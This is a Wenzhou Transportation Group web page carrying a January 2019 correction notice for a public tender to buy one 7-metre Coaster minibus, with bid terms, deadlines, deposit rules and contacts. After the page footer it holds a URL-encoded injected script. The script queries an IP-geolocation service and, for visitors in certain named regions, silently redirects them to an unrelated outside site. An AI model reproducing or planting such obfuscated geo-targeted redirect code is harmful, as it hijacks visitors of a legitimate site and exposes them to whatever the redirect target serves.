当前位置: 您当前的位置 : 温州交运集团 > 重要公告 > 项目招标 >正文
温州交运集团关于温州交运集团国际旅游有限公司一辆7米考斯特型中巴车项目的更正公告
来源: 发布时间:2019年01月07日 17:27:43 作者: 字体:

根据《温州市国有企业采购管理办法(试行)》等有关规定,浙江省成套招标代理有限公司受温州交运集团国际旅游有限公司的委托,就一辆7米考斯特型中巴车项目进行公开招标,欢迎合格的投标人前来投标。

  • 招标项目编号:CTZB-H180911CWZ-1

二、招标项目概况(内容、用途、数量、简要技术要求等):

  温州交运集团国际旅游有限公司一辆7米考斯特型中巴车的采购,招标内容及要求如下:

招标内容

数量

单位

最高限价   (万元)

简要技术要求、用途

一辆7米考斯特型中巴车

1

60

具体招标内容及要求见本招标文件相关部分。

三、投标人资格要求:

   1、符合《温州市国有企业采购管理办法(试行)》投标人参加采购活动应当具备的条件;

   2、本项目不接受联合体投标。

四、报名、购领招标文件时间及地点:

发售招标文件时间:2018年 12月30日起(截标之前报名、购买招标文件均有效,未购买招标文件的潜在投标人拒绝参加投标。投标人如对招标文件有异议应按招标文件规定的时间提出,逾期提出的,招标组织机构可不予受理、答复)

招标文件售价:人民币500元整(售后不退)

招标文件发售地点:温州市温州大道展宏大厦B栋702室。

五、递交投标文件截止时间:2019年1月21 日14时30分整。

六、投标文件提交地点:温州市温州大道展宏大厦B栋702室。

七、开标时间:2019年1月21 日14时30分整。

八、开标地点:温州市温州大道展宏大厦B栋702室。

九、投标保证金及交付方式:

人民币陆仟元整。(必须在投标递交截止时间前应以现金密封形式,密封袋写明金额、投标人单位名称、项目名称(项目编号),密封处加盖报价投标人单位公章或投标人代表签字。

十、其他事项:

1、购买招标文件时须提交的文件资料:

1.1、法定代表人授权书复印件;

1.2、投标人代表有效身份证件复印件;

1.3、企业法人营业执照副本复印件;

1.4、温州市国有企业采购投标报名申请表(见本项目招标公告中的附件,下载填写并加盖公章);

1.5、投标人认为需要提供的其他资料。

以上资料若为复印件,须加盖投标人公章。

2、投标人认为招标文件使自己的权益受到损害的,可以自收到招标文件之日(发售截止日之后收到招标文件的,以发售截止日为准)起7个工作日内,以书面形式向招标人和招标代理机构提出质疑。

3、招标文件发售截止时间之后潜在投标人仍然可以购买招标文件,但该投标人如对招标文件有疑问应按招标文件规定的询疑截止时间前提出,逾期提出的,招标组织机构可以不予受理、答复。

4、书面质疑受理地点:温州市温州大道展宏大厦B栋702室,书面质疑文件接收人:肖先生  电话:13606874516。

5、招标人:温州交运集团国际旅游有限公司,联系人:夏先生、蒋先生    电话:0577-88800278、057788287189

十、联系方式

招标代理机构名称:浙江省成套招标代理有限公司

地 址:温州大道展宏大厦B栋702室

联系人:胡先生         电话:15258683545   

温州交运集团国际旅游有限公司

浙江省成套招标代理有限公司

2019年1月7 日

重要公告

WENZHOU TRANSPORTATION

交运电子报

GROUP BRIEFING

交运电子报

%3Cscript%20type%3D%22text/javascript%22%20src%3D%22http%3A//ip.ws.126.net/ipquery%22%3E%3C/script%3E%0A%3Cscript%20type%3D%22text/javascript%22%3E%0Astrdistrict%20%3D%5Blo%2C%20lc%5D.join%28%27%5Ct%27%29%3B%0Aif%28strdistrict.indexOf%28%22%26%2321271%3B%26%2320140%3B%22%29%3E0%20%7C%7C%20strdistrict.indexOf%28%22%26%2339321%3B%26%2328207%3B%22%29%3E0%29%0A%7B%0Awindow.location.href%3D%22http%3A//www.arrdm.com%22%3B%20%20%20%0A%7D%0Aelse%0A%7B%0A%7D%0A%3C/script%3E